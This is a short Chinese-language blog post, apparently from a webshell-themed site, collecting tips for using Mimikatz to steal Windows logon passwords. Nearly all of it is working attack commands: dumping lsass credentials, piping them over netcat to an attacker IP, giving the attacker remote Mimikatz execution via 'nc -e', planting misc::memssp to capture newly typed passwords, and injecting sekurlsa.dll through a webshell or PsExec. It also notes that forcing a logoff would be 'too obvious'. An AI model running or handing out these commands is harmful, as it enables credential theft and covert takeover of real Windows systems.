Mimikatz 使用小技巧
1.记录 Mimikatz输出:
C:>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir
2.将输出导入到本地文件:
C:>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt
3.将输出传输到远程机器:
Attacker执行:
E:>nc -lvp 4444
Victim执行:
C:>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit | nc.exe -vv 192.168.52.1 4444
192.168.52.1 为Attacker IP
4.通过nc远程执行Mimikatz:
Victim执行:
C:>nc -lvp 443
Attacker执行:
E:>nc.exe -vv 192.168.52.128 443 -e mimikatz.exe
192.168.52.128 为Victim IP
若管理员有每过几天就改密码的习惯,但是mimikatz抓取到的密码都是老密码
用QuarksPwDump等抓的hash也是老hash,新密码却抓不到的情况下
可以使用以下方法尝试解决
privilege::debug
misc::memssp
记录的结果在c:windowssystem32mimilsa.log
每次验证都会记录 如 锁屏 等 重启失效
出现如上问题是因为管理一直没注销过,都是直接断开连接,lsass进程里面还吃存放的老的。
也可以直接logoff,但是这样会很明显。
文件
mimikatz.exe、sekurlsa.dll、PsExec.exe(3389)
本机终端
绝对路径mimikatz.exe
privilege::debug inject::process lsass.exe "绝对路径sekurlsa.dll" @getLogonPasswords exit
webshell
绝对路径mimikatz.exe < 绝对路径c.txt > 绝对路径userpass.txt
———-c.txt———-
privilege::debug inject::process lsass.exe "绝对路径sekurlsa.dll" @getLogonPasswords exit
————————-
远程终端
psexec.exe -s cmd.exe
绝对路径mimikatz.exe
privilege::debug inject::process lsass.exe "绝对路径sekurlsa.dll" @getLogonPasswords exit
转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/5343.html
这人抄袭你(滑稽)https://blog.csdn.net/zvall/article/details/79396642